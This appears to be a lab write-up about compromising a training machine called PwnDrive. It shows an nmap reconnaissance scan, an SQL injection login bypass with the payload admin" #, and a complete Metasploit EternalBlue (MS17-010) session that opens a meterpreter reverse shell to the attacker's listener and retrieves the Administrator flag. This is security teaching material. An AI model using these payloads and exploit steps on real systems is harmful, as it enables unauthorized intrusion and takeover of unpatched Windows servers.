We first begin by performing an nmap scan to determine what ports are open and what services are running behind them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
➜ nmap -sC -sV -T4 10.150.150.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 16:05 EDT
Nmap scan report for 10.150.150.11 (10.150.150.11)
Host is up (0.16s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Xlight ftpd 3.9
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
|_http-title: PwnDrive - Your Personal Online Storage
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| tls-alpn:
|_ http/1.1
|_http-title: Bad request!
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows Server 2008 R2 Enterprise 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.2100.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-08-24T13:11:13
|_Not valid after: 2050-08-24T13:11:13
|_ssl-date: 2022-04-12T21:02:54+00:00; +45m38s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: PWNDRIVE
| NetBIOS_Domain_Name: PWNDRIVE
| NetBIOS_Computer_Name: PWNDRIVE
| DNS_Domain_Name: PwnDrive
| DNS_Computer_Name: PwnDrive
|_ Product_Version: 6.1.7601
3306/tcp open mysql MySQL 5.5.5-10.4.14-MariaDB
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: PWNDRIVE
| NetBIOS_Domain_Name: PWNDRIVE
| NetBIOS_Computer_Name: PWNDRIVE
| DNS_Domain_Name: PwnDrive
| DNS_Computer_Name: PwnDrive
| Product_Version: 6.1.7601
|_ System_Time: 2022-04-12T21:01:36+00:00
|_ssl-date: 2022-04-12T21:02:41+00:00; +45m37s from scanner time.
| ssl-cert: Subject: commonName=PwnDrive
| Not valid before: 2022-04-11T21:02:14
|_Not valid after: 2022-10-11T21:02:14
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.150.150.11:1433:
| Version:
| name: Microsoft SQL Server 2012 RTM
| number: 11.00.2100.00
| Product: Microsoft SQL Server 2012
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: PWNDRIVE, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:89:87:cb (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 (Windows Server 2008 R2 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| NetBIOS computer name: PWNDRIVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-04-12T14:00:10-07:00
|_clock-skew: mean: 1h45m38s, deviation: 2h38m45s, median: 45m37s
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-12T21:00:45
|_ start_date: 2020-08-24T13:11:20
We have Apache running on port 80 & 443. Looking at the site running, we get:
There’s nothing much going on here but we do see a Sign in button. Clicking on it, we get a login screen. Trying some default credentials didn’t work. So i decided to use some SQL Injection Authentication Payloads from PentestLab.
Loging in with the username and password as : admin" # worked and we get access as an administrator
Browsing around, we find potential usernames.
There is a file upload functionality but that didn’t work out well for me.(If you managed to get a shell using this method, fire me a DM on twitter😉). Moving on, we also have port 445 open. So i decide to test if the machine was vulnerable to EternalBlue (smb-vuln-ms17-010). You can do so using nmap’s scripting engine (NSE) using any of the commands listed below:
1
2
nmap -p445 --script vuln xx.xx.xx.xx
nmap -p445 --script smb-vuln-ms17-010 xx.xx.xx.xx
In our case, we see the machine is VULNERABLE!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
➜ nmap -p445 --script smb-vuln-ms17-010 10.150.150.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-21 08:34 EDT
Nmap scan report for 10.150.150.11
Host is up (0.16s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds
Good o’ Metasploit has a module that can exploit this vulnerability. You can read more abou the same in rapid7’s blog.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar
get machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.24 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.150.150.11
RHOSTS => 10.150.150.11
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.66.67.174:4444
[*] 10.150.150.11:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.11:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.11:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.150.150.11:445 - The target is vulnerable.
[*] 10.150.150.11:445 - Connecting to target for exploitation.
[+] 10.150.150.11:445 - Connection established for exploitation.
[+] 10.150.150.11:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.11:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.11:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.11:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.11:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.11:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.11:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.11:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.11:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.11:445 - Starting non-paged pool grooming
[+] 10.150.150.11:445 - Sending SMBv2 buffers
[+] 10.150.150.11:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.11:445 - Sending final SMBv2 buffers.
[*] 10.150.150.11:445 - Sending last fragment of exploit packet!
[*] 10.150.150.11:445 - Receiving response from exploit packet
[+] 10.150.150.11:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.11:445 - Sending egg to corrupted connection.
[*] 10.150.150.11:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.11
[*] Meterpreter session 2 opened (10.66.67.174:4444 -> 10.150.150.11:52184 ) at 2022-04-21 08:16:47 -0400
[+] 10.150.150.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 3580 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
After setting the required options , we get a shell. Looking around, we see we have several users on the system. Looking around the Administrator’s Desktop Dir, we get the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
C:\Windows\system32>cd ..\..\Users
cd ..\..\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is F80A-FDD9
Directory of C:\Users
07/16/2020 06:44 AM <DIR> .
07/16/2020 06:44 AM <DIR> ..
06/27/2016 12:21 AM <DIR> Administrator
06/27/2016 02:05 AM <DIR> Classic .NET AppPool
03/28/2020 09:01 AM <DIR> Jboden
06/27/2016 01:58 AM <DIR> MSSQL$SQLEXPRESS
07/13/2009 09:57 PM <DIR> Public
07/16/2020 06:44 AM <DIR> tony
0 File(s) 0 bytes
8 Dir(s) 25,281,761,280 bytes free
C:\Users\tony>cd Administrator
cd Administrator
C:\Users\Administrator>dir Desktop
dir Desktop
Volume in drive C has no label.
Volume Serial Number is F80A-FDD9
Directory of C:\Users\Administrator\Desktop
11/17/2020 07:19 AM <DIR> .
11/17/2020 07:19 AM <DIR> ..
11/17/2020 07:20 AM 30 FLAG1.txt
08/11/2020 08:29 AM 979 Xlight FTP Server.lnk
2 File(s) 1,009 bytes
2 Dir(s) 25,281,695,744 bytes free
That’s it for this box. It was preety easy to exploit and get the flag. Special shout out to the team behind the PTD network: